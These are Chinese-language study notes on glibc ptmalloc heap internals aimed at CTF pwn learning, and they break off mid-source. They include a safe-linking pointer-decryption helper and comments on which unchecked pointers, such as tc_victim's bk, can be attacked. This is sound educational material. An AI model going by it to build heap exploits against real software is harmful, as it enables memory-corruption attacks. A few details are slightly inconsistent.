参考文章

https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/introduction/

https://www.cnblogs.com/ve1kcon/p/18071091

https://iyheart.github.io/2024/10/11/CTFblog/PWN%E7%B3%BB%E5%88%97blog/Linux_pwn/2.%E5%A0%86%E7%B3%BB%E5%88%97/PWN%E5%A0%86unlink/index.html

https://eastxuelian.nebuu.la/glibc/glibc-simple

https://www.roderickchan.cn/zh-cn/2023-02-27-house-of-all-about-glibc-heap-exploitation/#21-house-of-spirit

https://zikh26.github.io/posts/501cca6.html

https://zp9080.github.io/post/%E5%A0%86%E6%9D%82%E8%AE%B0/%E9%AB%98%E7%89%88%E6%9C%ACoff-by-null/

https://blog.csdn.net/qq_41683953/article/details/136767925

http://124.220.191.5/2025/09/13/off-by-null/index.html

https://9anux.org/2024/08/06/house%20of%20water%20&%20TFCCTF%202024%20MCGUAVA/

https://zephyr369.online/houseofwater/

https://bbs.kanxue.com/thread-268245.htm

https://enllus1on.github.io/2024/01/22/new-read-write-primitive-in-glibc-2-38/#more%EF%BC%8C%E6%94%B9%E8%BF%9B%E5%90%8E%E5%B0%B1%E4%B8%8D%E9%9C%80%E8%A6%81wide_data%E4%BA%86

https://zp9080.github.io/post/%E5%A0%86%E6%94%BB%E5%87%BBio_file/house-of-apple1/

https://196082.github.io/2022/08/05/house-of-apple2/

https://www.cnblogs.com/mazhatter/p/18475601

https://blog.csome.cc/p/house-of-some/

https://nicholas-wei.github.io/2022/02/07/tcache-stashing-unlink-attack/

https://xz.aliyun.com/spa/#/news/5139

https://blog.csdn.net/qq_45323960/article/details/123810198?ops_request_misc=&request_id=&biz_id=102&utm_term=io_file&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduweb~default-1-123810198.142^v102^pc_search_result_base8&spm=1018.2226.3001.4187

https://bbs.kanxue.com/thread-272098.htm

https://bbs.kanxue.com/thread-275968.htm

https://www.cameudis.com/2024/04/18/BlackHatMEA2023-House-of-Minho.html

堆的结构和管理

ptmalloc

brk

int brk(const void *addr)

参数为新的堆顶,返回值:成功返回0,否则为-1

sbrk

void* sbrk(intptr_t incr)

参数为堆增加的大小(可以是负数和零),返回新的堆顶的地址

mmap

void *mmap(void *addr, size_z length, int prot,int flags,int fd, off_t offset)

其中,参数的含义如下: - start:映射区的开始地址,通常设置为NULL,表示由系统确定地址。 - length:映射区的长度。 * prot:映射区的保护权限,可以是PROT_EXECPROT_READPROT_WRITEPROT_NONE的组合。 - flags:影响映射区域的各种特性,如MAP_SHAREDMAP_PRIVATEMAP_FIXED等。 - fd:要映射到内存中的文件描述符,通常由open函数返回。 - offset:文件映射的偏移量,通常设置为0

成功返回被映射区的指针,失败时返回MAP_FAILED

munmap

int munmap(void *addr, size_t length)

参数startmmap返回的地址,length是映射区的大小

成功执行时返回0,失败时返回-1

mmap()和brk()/sbrk()这两种不同方式申请的堆内存是互相独立的,各自管理不同的内存区域,使用mmap时并不会自动调整brk指针

chunk

struct malloc_chunk {    
INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */

struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;

/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};

下面我们来看 chunk 结构体,各个字段的具体的解释如下:

  • prev_size, 如果该 chunk 的 物理相邻的前一地址 chunk(两个指针的地址差值为前一 chunk 大小) 是空闲的话,那该字段记录的是前一个 chunk 的大小 (包括 chunk 头)。否则,该字段可以用来存储物理相邻的前一个 chunk 的数据。这里的前一 chunk 指的是较低地址的 chunk 
  • size ,该 chunk 的大小,大小必须是 MALLOC_ALIGNMENT 的整数倍。如果申请的内存大小不是 MALLOC_ALIGNMENT 的整数倍,会被转换满足大小的最小的 MALLOC_ALIGNMENT 的倍数,这通过 request2size() 宏完成。32 位系统中, MALLOC_ALIGNMENT 可能是 4 或 8 ;64 位系统中,MALLOC_ALIGNMENT 是 8
    • 该字段的低三个比特位对 chunk 的大小没有影响,它们从高到低分别表示
    • NON_MAIN_ARENA,记录当前 chunk 是否不属于主线程,1表示不属于,0表示属于
    • IS_MAPPED,记录当前 chunk 是否是由 mmap 分配的,M=1为mmap映射区域分配,M=0heap区域分配
    • PREV_INUSE,记录前一个 chunk 块是否被分配
      • 一般来说,堆中第一个被分配的内存块的 size 字段的 P位都会被设置为 1
      • 当一个 chunk 的 sizeP 位为 0 时,我们能通过 prev_size 字段来获取上一个 chunk 的大小以及地址
      • p=1时,表示前一个chunk正在使用,prev_size无效
  • fd,bk。 chunk 处于分配状态时,从 fd 字段开始是用户的数据。 chunk 空闲时,会被添加到对应的空闲管理链表中,其字段的含义如下
    • fd 指向下一个(非物理相邻)空闲的 chunk 。
    • bk 指向上一个(非物理相邻)空闲的 chunk 。
    • 通过 fdbk 可以将空闲的 chunk 块加入到空闲的 chunk 块链表进行统一管理。
  • fd_nextsize, bk_nextsize,也是只有 chunk 空闲的时候才使用,不过其用于较大的 chunk(large chunk)
    • fd_nextsize 指向前一个与当前 chunk 大小不同的第一个空闲块,不包含 bin 的头指针。
    • bk_nextsize 指向后一个与当前 chunk 大小不同的第一个空闲块,不包含 bin 的头指针。
    • 一般空闲的 large chunk 在 fd 的遍历顺序中,按照由大到小的顺序排列。这样做可以避免在寻找合适 chunk 时挨个遍历。
// 获取用户数据部分的指针  
#define chunk2mem(p) ((void*)((char*)(p) + 2 * sizeof(size_t)))

// 从用户数据指针获取chunk指针
#define mem2chunk(mem) ((mchunkptr*)((char*)(mem) - 2 * sizeof(size_t)))

// 获取下一个chunk的指针
#define next_chunk(p) ((mchunkptr*)((char*)(p) + ((p)->size & ~0x7)))

我们称前两个字段称为 chunk header,后面的部分称为 user data。每次 malloc 申请得到的内存指针,其实指向 user data 的起始处

top chunk

  • 第一次使用malloc时向系统申请内存放入top chunk中,此时av->top会指向top chunkprev_size位,然后从top chunk中切割一块chunk
  • 再次使用malloc时先判断bins中是否有符合要求的空闲堆,没有的话就从top chunk中切割一块,然后更新main_arenatop指针
  • 如果申请的堆块大小大于top chunk大小,top chunkbins中空闲的chunk合并,并查看合并的top chunk是否满足要求
  • 以上都不满足则通过系统调用申请额外内存,拓展到top chunk

bins

bin是一个由struct chunk结构体组成的链表,负责管理free chunk

#include <stddef.h>  

typedef struct malloc_chunk* mchunkptr;
typedef struct malloc_chunk *mfastbinptr;
// 内存块结构定义
typedef struct malloc_chunk {
size_t prev_size; // 前一个块的大小
size_t size; // 当前块的大小
struct malloc_chunk* fd; // 前向指针
struct malloc_chunk* bk; // 后向指针
} mchunkptr;

// 分配器状态结构定义
typedef struct malloc_state {
mchunkptr* fastbinsY[10]; // fast bins数组,简化为10个大小
mchunkptr* unsorted_bin; // unsorted bin链表头
mchunkptr* smallbins[64]; // small bins数组,简化为64个大小
mchunkptr* largebins[64]; // large bins数组,简化为64个大小
// 其他管理信息
} mstate;

// 初始化malloc_state
void init_malloc_state(mstate* state) {
for (int i = 0; i < 10; ++i) {
state->fastbinsY[i] = NULL;
}
state->unsorted_bin = NULL;
for (int i = 0; i < 64; ++i) {
state->smallbins[i] = NULL;
state->largebins[i] = NULL;
}
}

fastbin

  • 大小:0x20~0x80(包括头)
  • 个数:10条链
  • fastbinschunksize最后一位始终置1,这是为了防止fastbinchunk的内存合并,以便快速分配
  • 是单向链表,使用fd连接,添加和移除都是对链表头操作,LIFO(后进先出)
  • 在释放时只会对链表指针头部的chunk进行校验,也就是说连续重复释放同一个chunk才会报错

unsortedbin

  • 大小:无限制
  • 个数:1个链表
  • 当用户释放的内存大于max_fast或者fastbins合并后的chunk都会首先进入unsortedbin
  • 是双向链表,FIFO(后进先出)

smallbin

  • 大小:小于0x400
  • 个数:62
  • 双向链表,FIFO
  • 释放small chunk时,先检查该chunk相邻的chunk是否为free,是的话就进行合并操作,合成成新的chunk,并从smallbin中移除,最后将新的chunk添加到unsortedbin中,之后unsortedbin进行整理后再添加到对应bin链上
  • 放入smallbin的条件
    • 符合大小范围
    • 释放堆到unsortedbin,再申请一个不在unsortedbinsmallbin中的堆,这样先前被放入unsortedbin的堆就会被放入smallbin
    • smallbin被切割后,切割后的堆先被放入unsortedbin中,再申请一个堆,没有使unsortedbin中堆块被切割,那么unsortedbin中的堆就会被放入smallbin
下标 32位 64位
2 16 32
3 24 48
x 8x 16x
63 504 1008

largebin

  • 大小:大于0x400
  • 个数:63
  • 使用fd_nextsizebk_nextsize连接
  • 同一个largebin中每个chunk的大小可以不一样
  • large chunk可以添加、删除在large bin的任何一个位置
  • 同一个largebin中的所有chunk按照大小进行从大到小的排列:最大的chunk放在一个链表的链头,最小的chunk放在链尾;相同大小的chunk按照最近使用顺序排序
  • 对比链表链头chunksize,如果足够大,就从链尾开始遍历该large bin,找到第一个size相等或接近的chunk进行分配,如果该chunk大于用户请求的size的话,就将该chunk拆分为两个chunk:前者进行分配并且size等同于用户请求的size;剩余的部分做为一个新的chunk添加到unsorted bin
  • 如果该large bin中最大的chunksize小于用户请求的size的话,那么就通过binmap找到了下一个非空的large bin的话,按照上一段中的方法分配chunk,无法找到则使用top chunk来分配合适的内存
  • free操作类似于smallbin
数量 公差
1 32 64
2 16 512
3 8 4096
4 4 32768
5 2 262144
6 1 不限制

tcache

  • 类似fastbinLIFO,头插法

  • 第一次 malloc 时,会先 malloc 一块内存用来存放 tcache_perthread_struct 。

  • free 内存,且 size 小于 small bin size

    • tcache 之前会放到 fastbin 或者 unsorted bin
    • tcache 后:
      • 先放到对应的 tcache 中,直到被填满(默认是 7 个)
      • 填满之后放到 fastbin 或者 unsorted bin
      • tcache 中的 chunk 不会合并(不取消 inuse bit
  • malloc 内存,且 sizetcache 范围内

    • 先从 tcachechunk,直到 tcache 为空,再从 bin 中找
    • tcache 为空时,如果 fastbin/smallbin/unsorted bin 中有 size 符合的 chunk,会先把 fastbin/smallbin/unsorted bin 中的 chunk 放到 tcache 中,直到填满。之后再从 tcache 中取;因此 chunkbin 中和 tcache 中的顺序会反过来

  • tcache指向的直接是用户地址,而不是之前bin指向的是header的地址

  • 对于tcacheglibc会在第一次申请堆块的时候创建一个tcache_perthread_struct的数据结构,同样存放在堆上

    /* 每个线程都有一个这个数据结构,所以他才叫"perthread"。保持一个较小的整体大小是比较重要的。 */  
    // TCACHE_MAX_BINS的大小默认为64

    // 在glibc2.26-glibc2.29中,counts的大小为1个字节,因此tcache_perthread_struct的大小为1*64 + 8*64 = 0x250(with header)
    typedef struct tcache_entry
    {
    struct tcache_entry *next;
    } tcache_entry;

    typedef struct tcache_perthread_struct
    {
    char counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS];
    } tcache_perthread_struct;

    //在glibc2.29及以上版本中加入了key,在2.33及以下是使用tcache_perthread_struct的地址,在2.34及以上是使用随机值,可以使用p/x tcache_key检验,放入tcache中会增添key,取出tcache会置空key
    typedef struct tcache_entry
    {
    struct tcache_entry *next;
    struct tcache_perthread_struct *key;
    }tcache_entry;

    typedef struct tcache_perthread_struct
    {
    char counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS]
    } tcache_perthread_struct;

    // 在glibc2.30及以上版本中,counts的大小为2个字节,因此tcache_perthread_struct的大小为2*64 + 8*64 = 0x290(with header)

    typedef struct tcache_entry
    {
    struct tcache_entry *next;
    struct tcache_perthread_struct *key;
    }tcache_entry;

    typedef struct tcache_perthread_struct
    {
    uint16_t counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS]
    } tcache_perthread_struct;

    //在2.32版本,ptmalloc引入了PROTECT_PTR,即保护指针的概念,其指针是被异或加密的,如果对系统的堆地址一无所知,将无法正确解读泄露的指针的真实值

    static __always_inline void
    tcache_put (mchunkptr chunk, size_t tc_idx)
    {
    tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

    /* Mark this chunk as "in the tcache" so the test in _int_free will
    detect a double free. */
    e->key = tcache_key;

    e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
    tcache->entries[tc_idx] = e;
    ++(tcache->counts[tc_idx]);
    }

    /* Caller must ensure that we know tc_idx is valid and there's
    available chunks to remove. Removes chunk from the middle of the
    list. */
    static __always_inline void *
    tcache_get_n (size_t tc_idx, tcache_entry **ep)
    {
    tcache_entry *e;
    if (ep == &(tcache->entries[tc_idx]))
    e = *ep;
    else
    e = REVEAL_PTR (*ep);

    if (__glibc_unlikely (!aligned_OK (e)))
    malloc_printerr ("malloc(): unaligned tcache chunk detected");

    if (ep == &(tcache->entries[tc_idx]))
    *ep = REVEAL_PTR (e->next);
    else
    *ep = PROTECT_PTR (ep, REVEAL_PTR (e->next));

    --(tcache->counts[tc_idx]);
    e->key = 0;
    return (void *) e;
    }

在新的entryputtcache的时候,其fd将会与0异或,换言之,没有被加密,利用这一点,可以轻松泄露heap地址

#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)

how2heap展示的解第二个freetcachefd指针

long decrypt(long cipher)
{
    puts("The decryption uses the fact that the first 12bit of the plaintext (the fwd pointer) is known,");
    puts("because of the 12bit sliding.");
    puts("And the key, the ASLR value, is the same with the leading bits of the plaintext (the fwd pointer)");
    long key = 0;
    long plain;
    for(int i=1; i<6; i++) {
        int bits = 64-12*i;
        if(bits < 0) bits = 0;
        plain = ((cipher ^ key) >> bits) << bits;
        key = plain >> 12;
        printf("round %d:\n", i);
        printf("key:    %#016lx\n", key);
        printf("plain:  %#016lx\n", plain);
        printf("cipher: %#016lx\n\n", cipher);
    }
    return plain;
}

写成python

def decrypt(cipher):
    key = 0
    plain = 0
    for i in range(1, 6):
        bits = 64 - 12 * i
        if bits < 0:
            bits = 0
        plain = ((cipher ^ key) >> bits) << bits
        key = plain >> 12
        #print(f"round {i}:")
        #print(f"key:    0x{key:016x}")
        #print(f"plain:  0x{plain:016x}")
        #print(f"cipher: 0x{cipher:016x}\n")
    return plain

if __name__ == "__main__":
    b = 0x55500000c7f9
    plaintext = decrypt(b)
    print(f"recovered value: 0x{plaintext:016x}")
   
#recovered value: 0x00005555555592a0

堆的初始化和管理流程

malloc

  • 第一次调用 malloc申请堆空间:首先会跟着 hook 指针进入 malloc_hook_ini() 函数里面进行对 ptmalloc 的初始化工作,并置空 hook,再调用 ptmalloc_init() 和 __libc_malloc()

  • 再次调用 malloc 申请堆空间:malloc() -> __libc_malloc() -> _int_malloc()

  • checked_request2size将请求内存大小转换为实际大小

  • 先尝试从fastbins中分配出去(0x80)

  • 再尝试从smallbins中分配出去(0x400)

    • smallbins还没有初始化则进行malloc_consolidate
      • malloc_statefastbin为空,则对整个malloc_state初始化
      • malloc_init_state(av)先初始化除fastbin以外的所有的bins初始化,在初始化fastbin
  • 进行malloc_consolidate,将fastbins中的chunk转移到unsortedbin

    • 没有初始化ptmalloc则初始化ptmalloc
    • 当前chunkprev_inuse位为0就会进行后向合并
    • 当前chunk的相邻高地址chunk是空闲的则进行前向合并
    • 当前chunk的下一个chunk如果不为top chunk,则将chunk放入unsortedbin
      • 如果为largebin则将fd_nextsizebk_nextsize置为NULL
    • 当前chunk的下一个chunk如果为top chunk,则将当前chunk合并入top chunk
    • 遍历完每一条fastbinsbin
  • 遍历 unsortedbin 中的 chunk

    • 如果 unsortedbin 只有一个chunk,并且这个chunk 在上次分配时被使用过,并且所需分配的 chunk 大小属于 smallbins,且 chunk 的大小大于等于需要分配的大小,这种情况下就直接将该 chunk 进行切割,剩下的部分继续留在 unsortedbin
    • 否则会从后往前一直整理这些chunk,根据 chunk 的空间大小将其放入所属 smallbin 链或是 largebin 链中,一直整理直到遇到 chunk_size = nb 的 chunk,或者说整理到 bin 链为空
      • unsortedbin 链里有多个 chunk 的情况时,chunk 不是直接在 unsortedbin 里面被切割的
      • 如果是只有一个的话就是直接切割
  • 遍历 smallbinslargebins,按照 smallest-first,best-fit 原则,找一个合适的 chunk,从中划分一块所需大小的 chunk,并将剩下的部分链入到 unsortedbin

  • 尝试从 top chunk 中分配所需 chunk

  • 还没能分配成功的话就到 sbrkmmap 了

free

  • 检查free_hook是否为空,不为空则执行这个函数指针指向的函数,执行后返回
  • 检查被freeaddr是否为0,为零直接返回
  • 修改addr指向chunk
  • 检查是否由mmap分配,是则单独处理,调用munmap_chunk()释放内存
  • 获取该chunkarena调用_int_free传入arena_ptrchunk_addr0(一个锁)
  • 检查是否能被链入fastbin
  • 进行一系列检查
    • 先获得分配区的锁
    • freechunk不能是top chunk
    • freechunk是通过sbrk()分配的,且下一个相邻的chunk地址不能超过了top chunk
    • freechunk的下一个相邻的chunksize的标志位要标志当前free chunk处于inuse
    • freechunk的下一个相邻 chunk 的大小,该大小要大于等于 2*SIZE_SZ 并且小于分配区所分配区的内存总量
  • 判断是链入fastbin还是与top_chunk合并
  • chunk覆盖垃圾数据,将chunk链入fastbindouble free检查等
  • 检查前一个堆是否空闲,空闲的话前向合并
  • 检查后一个堆是否为top chunk,是否空闲,空闲的话后向合并
  • 合并的堆块如果和top chunk相连则直接合并,否则放入unsortedbin中并进行检查
  • 进行malloc_consolidate
  • 进行一系列操作
    • 如果合并后的chunk大小大于0x10000,并且fastbins存在空闲chunk,调用malloc_consolidate
    • top chunk大小大于heap收缩阈值,则收缩
    • 获得了分配区的锁则对分配区解锁
  • 大块内存单独处理
  • 使用场景:
    • malloc
      • large bin
      • 遍历unsortedbin
      • 从比请求的chunk所在的bin大的bin中取chunk
    • free
      • 后向合并(合并物理相邻低地址空闲chunk)
      • 前向合并(除了top chunk
    • malloc_consolidate
      • free
    • realloc
      • 前向拓展(除了top chunk

malloc_consolidate

  • 触发点:
    • _int_malloc_:一个sizesmallbin、largebinchunk正在被分配,或没有适合的bins被寻找重新申请回去并且top chunk太小了不能满足malloc的申请
    • _int_free:如果这个chunk不小于FASTBIN_CONSOLIDATION_THRESHOLD (65536)
    • malloc_trim:总是调用
    • _int_mallnfo
    • mallopt:总是调用
  • _int_malloc_(large size)
    • fastbin中堆与top chunk相邻
    • fastbin中堆不与top chunk相邻
    • 合并fastbin中物理相邻的堆块(不同大小也可以) ### malloc_state

main arena 的 malloc_state 并不是 heap segment 的一部分,而是一个全局变量,存储在 libc.so 的数据段

struct malloc_state { 
/* Serialize access. */
__libc_lock_define(, mutex);
/* Flags (formerly in max_fast). */
int flags; /* Fastbins */
mfastbinptr fastbinsY[ NFASTBINS ];
/* Base of the topmost chunk -- not otherwise kept in a bin */
mchunkptr top;
/* The remainder from the most recent split of a small request */
mchunkptr last_remainder;
/* Normal bins packed as described above */
mchunkptr bins[ NBINS * 2 - 2 ];
/* Bitmap of bins, help to speed up the process of determinating if a given bin is definitely empty.*/
unsigned int binmap[ BINMAPSIZE ];
/* Linked list, points to the next arena */
struct malloc_state *next;
/* Linked list for free arenas. Access to this field is serialized by free_list_lock in arena.c. */
struct malloc_state *next_free;
/* Number of threads attached to this arena. 0 if the arena is on the free list. Access to this field is serialized by free_list_lock in arena.c. */
INTERNAL_SIZE_T attached_threads;
/* Memory allocated from the system in this arena. */
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};

*heap_info

#define HEAP_MIN_SIZE (32 * 1024) 
#ifndef HEAP_MAX_SIZE
# ifdef DEFAULT_MMAP_THRESHOLD_MAX
# define HEAP_MAX_SIZE (2 * DEFAULT_MMAP_THRESHOLD_MAX)
# else
# define HEAP_MAX_SIZE (1024 * 1024) /* must be a power of two */
# endif
#endif
/* HEAP_MIN_SIZE and HEAP_MAX_SIZE limit the size of mmap()ed heaps that are dynamically created for multi-threaded programs. The maximum size must be a power of two, for fast determination of which heap belongs to a chunk. It should be much larger than the mmap threshold, so that requests with a size just below that threshold can be fulfilled without creating too many heaps. */
/***************************************************************************/
/* A heap is a single contiguous memory region holding (coalesceable) malloc_chunks. It is allocated with mmap() and always starts at an address aligned to HEAP_MAX_SIZE. */
typedef struct _heap_info
{
mstate ar_ptr; /* Arena for this heap. */
struct _heap_info *prev; /* Previous heap. */
size_t size; /* Current size in bytes. */
size_t mprotect_size; /* Size in bytes that has been mprotected PROT_READ|PROT_WRITE. */
/* Make sure the following data is properly aligned, particularly that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of MALLOC_ALIGNMENT. */
char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK];
} heap_info;

源代码

__libc_malloc

void *
__libc_malloc(size_t bytes)
{
//首先检查是否存在内存分配的 hook 函数,如果存在,调用 hook 函数,并返回,hook 函数主要用于进程在创建新线程过程中分配内存,或者支持用户提供的内存分配函数。
mstate ar_ptr;
void *victim;

void *(*hook)(size_t, const void *) = atomic_forced_read(__malloc_hook);
if (__builtin_expect(hook != NULL, 0))
return (*hook)(bytes, RETURN_ADDRESS(0));

//获取分配区指针,如果获取分配区失败,返回退出,否则,调用 _int_malloc() 函数分配内存。
arena_get(ar_ptr, bytes);

victim = _int_malloc(ar_ptr, bytes);
/* Retry with another arena only if we were able to find a usable arena
before. */


//如果 _int_malloc() 函数分配内存失败,就会判断使用的分配区是不是主分配区,然后是一些获取分配区,解锁之类的操作。
if (!victim && ar_ptr != NULL)
{
LIBC_PROBE(memory_malloc_retry, 1, bytes);
ar_ptr = arena_get_retry(ar_ptr, bytes);
victim = _int_malloc(ar_ptr, bytes);
}

if (ar_ptr != NULL)
(void)mutex_unlock(&ar_ptr->mutex);

assert(!victim || chunk_is_mmapped(mem2chunk(victim)) ||
ar_ptr == arena_for_chunk(mem2chunk(victim)));
return victim;
}

__malloc_hook

__malloc_hook 指向 malloc_hook_ini,该函数为 ptmalloc 的初始化函数。主要用于初始化全局状态机和 chunk 的数据结构,首先来看看 malloc_hook_ini 函数

/**

* 初始化。

*/

static void *

malloc_hook_ini (size_t sz, const void *caller){
//先将 malloc_hook 的值设置为 NULL,然后调用 ptmalloc_init 函数,最后又回调了 libc_malloc 函数。
__malloc_hook = NULL;
ptmalloc_init ();
return __libc_malloc (sz);

}

#### _int_malloc
static void *
_int_malloc(mstate av, size_t bytes)
{
INTERNAL_SIZE_T nb; /* 符合要求的请求大小 */
unsigned int idx; /* 相关的bin指数 */
mbinptr bin; /* 相关的bin */

mchunkptr victim; /* 检查/选择的块 */
INTERNAL_SIZE_T size; /* its size */
int victim_index; /* its bin index */

mchunkptr remainder; /* 被分割的剩余部分 */
unsigned long remainder_size; /* its size */

unsigned int block; /* bit map traverser */
unsigned int bit; /* bit map traverser */
unsigned int map; /* current word of binmap */

mchunkptr fwd; /* misc temp for linking */
mchunkptr bck; /* misc temp for linking */

const char *errstr = NULL;

/*
Convert request size to internal form by adding SIZE_SZ bytes
overhead plus possibly more to obtain necessary alignment and/or
to obtain a size of at least MINSIZE, the smallest allocatable
size. Also, checked_request2size traps (returning 0) request sizes
that are so large that they wrap around zero when padded and
aligned.
*/

checked_request2size(bytes, nb);

/*
If the size qualifies as a fastbin, first check corresponding bin.
This code is safe to execute even if av is not yet initialized, so we
can try it without checking, which saves some time on this fast path.
*/

if ((unsigned long)(nb) <= (unsigned long)(get_max_fast()))
{
//根据所需 chunk 的大小获得该 chunk 所属 fast bin 的 index。
idx = fastbin_index(nb);

//从链中取出第一个 chunk,并调用 chunk2mem() 函数返回用户所需的内存块。
mfastbinptr *fb = &fastbin(av, idx);
mchunkptr pp = *fb;
do
{
victim = pp;
if (victim == NULL)
break;
} while ((pp = catomic_compare_and_exchange_val_acq(fb, victim->fd, victim)) != victim);
if (victim != 0)
{
if (__builtin_expect(fastbin_index(chunksize(victim)) != idx, 0))
{
errstr = "malloc(): memory corruption (fast)";
errout:
malloc_printerr(check_action, errstr, chunk2mem(victim), av);
return NULL;
}
check_remalloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}

/*
If a small request, check regular bin. Since these "smallbins"
hold one size each, no searching within bins is necessary.
(For a large request, we need to wait until unsorted chunks are
processed to find best fit. But for small ones, fits are exact
anyway, so we can check now, which is faster.)
*/

if (in_smallbin_range(nb))
{
idx = smallbin_index(nb);

//根据 index 获得某个 small bin 的空闲 chunk 双向循环链表表头,在 if 语句里将最后一个 chunk 赋值给 victim。
bin = bin_at(av, idx);
//如果 victim 与表头相同,表示该链表为空,不能从 small bin 的空闲 chunk 链表中分配。
//下面都是 victim 与表头不相同的情况。
if ((victim = last(bin)) != bin)
{
//如果 victim 为 0,表示所属 small bin 还没有初始化为双向循环链表,调用 malloc_consolidate() 函数将 fast bins 中的 chunk 合并。
if (victim == 0) /* initialization check */
malloc_consolidate(av);
//否则说明有合适的 chunk 在对应的 bin 链,将 victim 从 small bin 的双向循环链表中取出,设置 victim chunk 的 inuse 标志,该标志处于 victim chunk 的下一个相邻 chunk 的 size 字段的第一个 bit。从 small bin 中取出 victim 也可以用 unlink() 宏函数,只是这里没有使用。
else
{
bck = victim->bk;
//经典的通过检查 victim 的 bck 的 fd 指针是否指向 victim,来确定链表是否有被破坏。
if (__glibc_unlikely(bck->fd != victim))
{
errstr = "malloc(): smallbin double linked list corrupted";
goto errout;
}
//脱链。
set_inuse_bit_at_offset(victim, nb);
bin->bk = bck;
bck->fd = bin;

//接着判断当前分配区是否为非主分配区,如果是,将 victim chunk 的 size 字段中的表示非主分配区的标志 bit 清零,最后调用 chunk2mem() 函数获得 chunk 的实际可用的内存指针,将该内存指针返回给应用层。
if (av != &main_arena)
victim->size |= NON_MAIN_ARENA;
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}
}

tcache
if (in_smallbin_range (nb))
{
idx = smallbin_index (nb);
bin = bin_at (av, idx);

if ((victim = last (bin)) != bin)
//victim就是要脱链的堆块,也就是small bin里的最后一个
//这个if在判断我们所需要的size的那条small bin链上是否存在堆块,存在的话就把victim给脱链
{
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim))//对small bin的双向链表的完整性做了检查,确保victim->bk->fd指向的还是victim
//如果我们在这里劫持了victim的bk指针,就会导致bck的fd指向的并不是victim,从而触发异常
malloc_printerr ("malloc(): smallbin double linked list corrupted");
set_inuse_bit_at_offset (victim, nb);//设置下一个(高地址)chunk的prev_inuse位
bin->bk = bck;//将victim脱链
bck->fd = bin;
if (av != &main_arena)
set_non_main_arena (victim);
check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);//获取size对应的tcache索引
if (tcache && tc_idx < mp_.tcache_bins)//如果这个索引在tcache bin的范围里,也就是这个size属于tcache bin的范围
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count//如果tcache bin没有满
&& (tc_victim = last (bin)) != bin)//如果small bin不为空,tc_victim为small bin中的最后一个堆块
{
if (tc_victim != 0)
{
bck = tc_victim->bk;//这里取tc_victim的bk指针,并没有针对bck做双向链表完整性检查,因此我们可以去攻击tc_victim的bk指针
set_inuse_bit_at_offset (tc_victim, nb);
if (av != &main_arena)
set_non_main_arena (tc_victim);
bin->bk = bck;//将tc_victim从small bin中脱链
bck->fd = bin;//如果我们伪造bck,这里就可以将bck->fd的位置写入一个bin的地址(main_arena+96)
tcache_put (tc_victim, tc_idx);//将tc_victim链入tc_idx这条链
}
}
}
#endif
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}

/*
If this is a large request, consolidate fastbins before continuing.
While it might look excessive to kill all fastbins before
even seeing if there is space available, this avoids
fragmentation problems normally associated with fastbins.
Also, in practice, programs tend to have runs of either small or
large requests, but less often mixtures, so consolidation is not
invoked all that often in most programs. And the programs that
it is called frequently in otherwise tend to fragment.
*/

else
{
idx = largebin_index(nb);
if (have_fastchunks(av))
malloc_consolidate(av);
}

  /*
Process recently freed or remaindered chunks, taking one only if
it is exact fit, or, if this a small request, the chunk is remainder from
the most recent non-exact fit. Place other traversed chunks in
bins. Note that this step is the only place in any routine where
chunks are placed in bins.

The outer loop here is needed because we might not realize until
near the end of malloc that we should have consolidated, so must
do so and retry. This happens at most once, and only when we would
otherwise need to expand memory to service a "small" request.
*/

for (;;)
{
int iters = 0;
//反向遍历 unsorted bin 的双向循环链表,遍历结束的条件是循环链表中只剩下一个头结点。
while ((victim = unsorted_chunks(av)->bk) != unsorted_chunks(av))
{
//检查当前遍历的 chunk 是否合法。
bck = victim->bk;
if (__builtin_expect(victim->size <= 2 * SIZE_SZ, 0) || __builtin_expect(victim->size > av->system_mem, 0))
malloc_printerr(check_action, "malloc(): memory corruption",
chunk2mem(victim), av);
size = chunksize(victim);

/*
If a small request, try to use last remainder if it is the
only chunk in unsorted bin. This helps promote locality for
runs of consecutive small requests. This is the only
exception to best-fit, and applies only when there is
no exact fit for a small chunk.
*/

//1.如果需要分配一个 small bin chunk,且 unsorted bin 中只有一个 chunk,且这个 chunk 为 last remainder chunk,且这个 chunk 的大小大于所需 chunk 的大小加上 MINSIZE,在满足这些条件的情况下,可以使用这个chunk切分出需要的small bin chunk。
//这是唯一的从 unsorted bin 中分配出 small bin chunk 的情况,这种优化利于 cpu 的高速缓存命中。
if (in_smallbin_range(nb) &&
bck == unsorted_chunks(av) &&
victim == av->last_remainder &&
(unsigned long)(size) > (unsigned long)(nb + MINSIZE))
{
/* split and reattach remainder */
//切割这个 chunk。
remainder_size = size - nb;
remainder = chunk_at_offset(victim, nb);
unsorted_chunks(av)->bk = unsorted_chunks(av)->fd = remainder;
av->last_remainder = remainder;
remainder->bk = remainder->fd = unsorted_chunks(av);
if (!in_smallbin_range(remainder_size))
{
